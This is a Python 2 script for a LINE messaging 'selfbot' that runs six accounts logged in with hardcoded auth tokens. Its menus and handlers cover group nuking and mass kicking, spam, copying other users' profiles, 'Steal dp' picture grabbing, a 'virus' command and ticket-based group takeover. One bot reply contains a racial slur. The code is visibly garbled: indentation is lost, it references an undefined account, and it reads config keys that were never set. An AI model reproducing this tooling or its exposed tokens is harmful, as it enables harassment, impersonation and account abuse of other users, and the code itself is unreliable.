# -*- coding: utf-8 -*-
import LINETCR
#import wikipedia
from LINETCR.lib.curve.ttypes import *
#from ASUL.lib.curve.ttypes import *
from datetime import datetime
# https://kaijento.github.io/2017/05/19/web-scraping-youtube.com/
from bs4 import BeautifulSoup
from threading import Thread
from googletrans import Translator
from gtts import gTTS
import time,random,sys,json,codecs,threading,glob,urllib,urllib2,urllib3,re,ast,os,subprocess,requests,tempfile
cl =LINETCR.LINE()
#cl.login(qr=True)
cl.login(token='EpEWkrCNDdyEx47avxn8.6S7B6iV24SxpyyIZPkjUga.NthYU32DNc7TNeBhhNe53dXfFAzJivL/c7yfHIojY5E=')
cl.loginResult()
ki = LINETCR.LINE()
#ki.login(qr=True)
ki.login(token='EpwCveO27uLkj5RABiZ9.Z2jqcI8fppmz+7xOGNlyEq.f4LsQDRQ89mvEI6kk7Ymzk1sPJsArDQRU9v6DIYWlvA=')
ki.loginResult()
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token='Ep5x39yHINyEEVb7eaYa.Ql+Iq95c4olkmxSaoadLoG.guCtCeFRGAxadoTr/JxRhLsDyLTeTNTj285/W6Moadw=')
ki2.loginResult()
ki3 = LINETCR.LINE()
#ki3.login(qr=True)
ki3.login(token='Epezl3XFYfIArh9F82x6.SGby4XQI1gAOTET1lBqQ9G.Kha8WacxePkq1eck0Kaxb83kSJ4odJGyVV9aMSvEspI=')
ki3.loginResult()
ki4 = LINETCR.LINE()
#ki4.login(qr=True)
ki4.login(token='EpUfPCc0QdIkGkErgJca.Q6+YE7DHLRb+4/UXmbKggG.LJL7TYkXyf5UpTvXGKBFSmyYPQJAz9cgbzl5bsKJBJI=')
ki4.loginResult()
ki5 = LINETCR.LINE()
#ki5.login(qr=True)
ki5.login(token='Epyyzy4CVbNqz8DSept8.7fLTCfOW6V77bikOdoT16a.QFITEuKTLXnmPlJ6XX43+Oe3oF3jKsLCE4JFL/mwOcA=')
ki5.loginResult()
cl
#ki6 = ASUL.LINE()
#AsulLogged = False
#cl = ASUL.LINE()
#cl.login(token='EoChmq5TXM73ZRg9P8ec.YLgVP2FFH7O3buLlL8m1xa.53z2MiS/devknmPfbJjsBhLEqtWnv6cUujv6wklIJsc')
#cl.loginResult()
print u"login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage =""" .‧:❉:¸¸.•*´¨`*•.¸¸‧:❉:
-[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-
`*✿ °• ☞(॓_॔)☜ •°✿*゚
||=====คำสั่งทั่วไป=====||
➣ [Me @]➣ดูคอนแทคเพื่อน
➣ [Tr-th]➣แปลเป็นไทย
➣ [Tr-en]➣แปลเป็นอังกฤษ
➣ [Ginfo]➣ดูข้อมูลกลุ่ม
➣ [Glist]➣ส่งของขวัญ
➣ [Cancel]➣ยกเลิกเชิน
➣ [Mid @]➣ดูเอมไอดีเพื่อน
➣ [Invite]➣เชินตามคอนแทค
➣ [Invite: ]➣เชินด้วยเอมไอดี
➣ [Whitelist @]
➣ [Whitelist:
➣ [Whitelist
➣ [Blacklist @
➣ [Blacklist:
➣ [Blacklist
➣ [Clear ban]เชคแบนโชว์คอนแทค
➣ [Link on]☆เปิดลิ้ง
➣ [Link off]☆ปิดลิ้ง
➣ [Gurl]
➣ [Url ]➣ลิ้งกลุ่ม
➣ [Gname]
➣ [Banlist ]
➣ [Details grup]
➣ [Inviteme:]
➣ [Info grup]
➣ [Gift-Allgift]➣ [ส่งของขวัญ-ทั้งหมด
➣ [Clear grup]
➣️ [Reject]☆ลบรันตัวเอง
➣ [Mic:]☆เชคคอนแทค
➣️ [Reject1]➣ [ลบรันคิกเก้อ
➣ [Nuke]☆ล้างห้อง
➣ [Mention,Tagall]➣แทคทั้งห้อง
➣ [Kick @ เตะ]
➣ [Kick:
➣ [Bc:ct]
➣ [Bc:grup]
➣ [Block @]
➣ [Youtube]➣ยูทูป
➣ [vdo]
➣ [Blocklist]
➣ [Spam on/off]➣รันข้อความแชท
➣ [ไวรัส01]
➣ [Bot:ct ]
➣ [Bot:grup.]
➣ [Allname:]
➣ [Allbio:]
➣ [Gc]☆ดูผู้สร้างห้อง
➣ [Speed]☆สปีดบอท
➣ [Conban]➣เชคแบน
➣ [Mycopy @] ➣ก้อปปี้โปรไฟล์
➣ [Copy1 @]
➣ [Copy2 @]
➣ [Copy3 @]
➣ [Copy4 @]
➣ [Copy5 @]
➣ [Mybackup @ ]➣กลับคืนค่าก้อปปี้
➣ [Like:on/off] ➣ออโต้ไลค์ เปิด/ปิด
➣ [Add on/off] ➣ออโต้แอด เปิด/ปิด
➣ [Join on/off]➣ออโต้เข้ากลุ่ม เปิด/ปิด
➣ [Contact on/off]➣อ่านคอนแทค เปิด/ปิด
➣ [Leave on/off] ➣ออโต้ออกแชทรวม เปิด/ปิด
➣ [Share on/off]➣โชว์ลิ้งโพส เปิด/ปิด
➣ [Getname @]➣เชคชื่อเพื่อน
➣ [Getbio @]➣
➣ [Getprofile @]➣เชคเสตัสเพื่อน
➣ [Jam on/off]➣
➣ [Jam say:]
➣ [Com on/off]
➣ [Message set:]
➣ [Comment set:]
➣ [Pesan add:]
||===== P R O T E C T =====||
➣ [Panick:on/off]
➣ [Allprotect on/off]➣ล้อกทั้งหมด เปิด/ปิด
➣ [Protect on]☆ป้องกันเปิด/ปิด
➣ [Qrprotect on/off]☆ล้อกคิวอารโค้ตเปิด/ปิด
➣ [Inviteprotect on/off]☆เชินเปิด/ปิด
➣ [Cancelprotect on/off]ยกเชินเปิด/ปิด
➣[Staff add/remove @]➣ เพิ่มแอด/ลบแอด
||======= FOR ADMIN =======||
‧:❉:¸¸.•*´¨`*•.¸¸‧:❉:
-[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-
`*✿ °• ☞(॓_॔)☜
line.me/ti/p/4bvwOIMft8
||========================||
"""
help2Message =""". ‧:❉:¸¸.•*´¨`*•.¸¸‧:❉:
-[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-
`*✿ °• ☞(॓_॔)☜ •°✿*゚
===✒️ ชุดคำสั่งAsul Bot ✒️ ===
||✒️ คท - ส่งคท.ตัวเอง(Me)
||✒️ ไอดี - ส่งMidตัวเอง
||✒️ คิกเกอร์ - เชคคท.คิกเกอร์ทั้งหมด
||✒️ คิกมา - เรียกคิกเกอร์เข้ากลุ่ม
||✒️ คิกออก - สั่งคิกเกอร์ออกกลุ่ม
||✒️ แทค - แทคสมาชิก
||✒️ จุด - ตั้งจุดเชคคนอ่าน
||✒️ อ่าน - เชครายชื่อคนอ่าน
||✒️ เชคกลุ่ม - เชคข้อมูลกลุ่ม
||✒️ ลิสกลุ่ม - เชคกลุ่มที่มีทั้งหมด
||✒️ ยกเชิญ,ยก - ยกเลิกเชิญ
||✒️ Mid @ - เชคMidรายบุคคล
||✒️ ดึง - เชิญคนเข้ากลุ่มด้วยคท.
||✒️ ดึง: - เชิญคนเข้ากลุ่ม้ดวยMid
||✒️ ขาว - แก้ดำ(ส่งคท.)
||✒️ ดำ - เพิ่มบัญชีดำ(ส่งคท.)
||✒️ เชคดำ - เชคบัญชีดำ
||✒️ ล้างดำ - ล้างบัญชีดำ
||✒️ เปิดลิ้ง
||✒️ ปิดลิ้ง
||✒️ ลิ้ง - เปิดและขอลิ้งกลุ่ม
||✒️ Gname: - เปลี่ยนชื่อกลุ่ม
||✒️ ลบรัน - ลบรันตัวเอง
||✒️ ลบรัน1 - ลบรันให้เพื่อน(ขอลิ้งให้ลอคอินก่อน)
||✒️ ขอลิ้ง - ขอลิ้งให้เพื่อนลอคอิน
||✒️ . - เชคสถานะลอคอิน
||✒️ Sp - เชคสปีด
||✒️ Bot sp - เชคสปีดคิกเกอร์
||✒️ Mycopy @ - กอพปี้โปรไฟล์
||✒️ Copy @ - คิกเกอร์1กอพปี้
||✒️ Mybackup - กลับร่างเดิม
||✒️ Backup - คิกเกอร์1กลับร่างเดิม
||✒️ Spam on/off - ส่งข้อความสแปม
||==============================||
✯★Creator By ‧:❉:¸¸.•*´¨`*•.¸¸‧:❉:
-[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-
`*✿ °• ☞(॓_॔)☜ •°✿*゚
line.me/ti/p/4bvwOIMft8
"""
helo=""
KAC=[cl,ki,ki2,ki3,ki4,ki5]
mid = cl.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
bot1 = cl.getProfile().mid
Bots = [mid,kimid,ki2mid,ki3mid,ki4mid,ki5mid]
admsa = "ueacedbe88bf6e2c5cf6188b3a4a26e18"
admin = "ueacedbe88bf6e2c5cf6188b3a4a26e18"
wait = {
'contact':True,
'autoJoin':False,
'autoCancel':{"on":False,"members":50},
'leaveRoom':True,
'timeline':False,
'autoAdd':False,
'message':"selt bot by= -[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-",
"lang":"JP",
"comment":"Auto Like By = -[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]- ",
"welmsg":"welcome to group",
"commentOn":False,
"likeOn":False,
"commentBlack":{},
"wblack":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":False,
"dblack":False,
"clock":False,
"cNames":"",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
"ricoinvite":{},
'ROM':{},
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
user1 = mid
user2 = ""
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def bot(op):
global AsulLogged
global ki6
global user2
global readAlert
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "ueacedbe88bf6e2c5cf6188b3a4a26e18":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
#------------------------
# if 'MENTION' in msg.contentMetadata.keys() != None:
# if wait["detectMention"] == True:
# contact = cl.getContact(msg.from_)
# cName = contact.displayName
# balas = ["แท็กทำไม",cName + " ฝากข้อความไว้นะครับ"]
# ret_ = "[ข้อความอัตโนมัติ] " + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# mention = ast.literal_eval(msg.contentMetadata['MENTION'])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# cl.sendText(msg.to,ret_)
# break
# if 'MENTION' in msg.contentMetadata.keys() != None:
# if wait["detectMention"] == True:
# contact = cl.getContact(msg.from_)
# cName = contact.displayName
# balas = ["จะแท็กทำไมมากมาย-กูเล่นเกมอยู่",cName + ""]
# ret_ = "[ข้อความอัตโนมัติ] " + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# mention = ast.literal_eval(msg.contentMetadata['MENTION'])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# cl.sendText(msg.to,ret_)
# msg.contentType = 7
# msg.text = ''
# msg.contentMetadata = {
# 'STKPKGID': '608',
# 'STKTXT': '[]',
# 'STKVER': '16',
# 'STKID':'5507'
# }
# cl.sendMessage(msg)
# break
#
# if 'MENTION' in msg.contentMetadata.keys() != None:
# if wait["kickMention"] == True:
# contact = cl.getContact(msg.from_)
# cName = contact.displayName
# balas = ["Dont Tag Me!! Im Busy",cName + " Ngapain Ngetag?",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja","-_-","Alin lagi off", cName + " Kenapa Tag saya?","SPAM PC aja " + cName, "Jangan Suka Tag gua " + cName, "Kamu siapa " + cName + "?", "Ada Perlu apa " + cName + "?","Tenggelamkan tuh yang suka tag pake BOT","Tersummon -_-"]
# ret_ = "[Auto Respond] " + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# mention = ast.literal_eval(msg.contentMetadata['MENTION'])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# cl.sendText(msg.to,ret_)
# cl.kickoutFromGroup(msg.to,[msg.from_])
# break
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if wait["sambut"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(op.param1,"(\__/) ||\n(•ㅅ•) ||\n/ づ\nʕ•̫͡•ʔ•̫͡•ʔ █▬█ █•̫͡•ʕ•̫͡•ʔ \n" + cl.getContact(op.param2).displayName + "\nยินต้อนรับสู่🔜\n " + str(ginfo.name) + "\n🍂มาใหม่แนะนำตัวด้วยนะ🍂\n" + "\nʕ•̫͡•ʔ•̫͡•ʕ•̫͡•ʔ")
cl.sendImageWithURL(op.param1,image)
print "ada orang masuk grup"
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
# ----------------- NOTIFED MEMBER OUT GROUP
if op.type == 15:
if op.param2 in bot1:
return
cl.sendText(op.param1,"ไปสะล่ะ ไว้เจอกันใหม่น่ะ @ " + cl.getContact(op.param2).displayName + " ลาก่อน\n~(^з^)-♡\n\n😍-[✭]-Ⓣ-Ⓗ-Ⓘ-Ⓡ-Ⓓ-[✭]-😍")
print ("MEMBER HAS LEFT THE GROUP")
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if op.param2 in bot1:
return
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1, "【.╭╮╭╮.\n∵╭═════════════════╮】\n【╭◆┴┴◆╮.│-----ยินดีต้อนรับ------****** │】\n 【│︵ ︵│<.. Good nigt na |】\n 【│ ╰╯ │.╰═════════════════╯】\n 【╰○--○╯.∵▼.∵▼.∵▼.∵▼.@ " + cl.getContact(op.param2).displayName + " สู่กลุ่ม " + "👉" + str(ginfo.name) + "👈""\n\n.¸.•´¸.•´¨) ¸.•*¨) \n( ¸.•´ (¸.•´ .•´ \n( ´¸..★/\︽﹨︽﹨︽☆︽\.☆ \n☆. /我 \︽﹨︽﹨︽★︽\° \n☆ │來 ║﹌﹌﹌﹌﹌﹌﹌│.▲\n ★ │簽簽║ 田 ╭┬╮田│◢█◣ \n@ │ 囉║ │││ ◢███◣ \n║╓╥╥☆. ● ●. ╥★╥╥▊╥╥╖\n ╔╩╬╬╬╬. _/█_/█_╔╩╬╬╬╬╬╬╬ \n\n--ขอให้มีความสุขกับบ้านหลังนี้--")
print "MEMBER HAS JOIN THE GROUP"
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
#if wait["sambut"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(op.param1,image)
print "ada orang masuk grup"
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["ricoinvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki.findAndAddContactsByMid(target)
ki.inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Invited this nigga💋: \n➡" + _name)
wait2["ricoinvite"] = False
break
except:
cl.sendText(msg.to,"Negative, Err0r Detected")
wait2["ricoinvite"] = False
break
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "💟ลิ้งโพสอยู่ด้านล้างน้ะจ้ะ💟\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpMessage)
#-----------------------------------------------
elif "Me @" in msg.text:
msg.contentType = 13
_name = msg.text.replace("Me @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
#-----------------------------------------------
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
#----------------------------------------------------------
#-----------------------------------------------
elif "Steal dp @" in msg.text:
nama = msg.text.replace("Steal dp @","")
target = nama.rstrip(' ')
van = cl.getGroup(msg.to)
for linedev in van.members:
if target == linedev.displayName:
midddd = cl.getContact(linedev.mid)
PATH = "http://dl.profile.line-cdn.net/" + midddd.pictureStatus
cl.sendImageWithURL(msg.to,PATH)
#================================================
elif msg.text in ["bot"]:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
ki6.sendMessage(msg)
elif "As1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "As2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "As3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "As4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "As5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif msg.text in ["Bot1 Gift","As1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Bot2 Gift","As2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Bot3 Gift","As3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Bot4 Gift","As4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Allgift","All Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
cl.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
elif msg.text in ["Cancel","cancel","ยกเชิญ","ยก"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan👈")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif "As1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "As2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "As3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "As4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "As5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "All mid" == msg.text:
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
elif "Mic:" in msg.text:
mmid = msg.text.replace("Mic:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Allname: " in msg.text:
string = msg.text.replace("Allname: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
elif "Allbio: " in msg.text:
string = msg.text.replace("Allbio: ","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
#---------------------------------------------------------
elif "Name:" in msg.text:
string = msg.text.replace("Name:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
elif "Name Bot" in msg.text:
string = msg.text.replace("Name Bot","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki2.updateProfile(profile)
ki3.updateProfile(profile)
ki4.updateProfile(profile)
ki5.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
#---------------------------------------------------------
elif "K1 upname:" in msg.text:
string = msg.text.replace("K1 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K2 upname:" in msg.text:
string = msg.text.replace("K2 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K3 upname:" in msg.text:
string = msg.text.replace("K3 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K4 upname:" in msg.text:
string = msg.text.replace("K4 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K5 upname:" in msg.text:
string = msg.text.replace("K5 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text.lower() == 'allin':
Ticket = cl.reissueGroupTicket(msg.to)
invsend = 0.22222
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.021)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
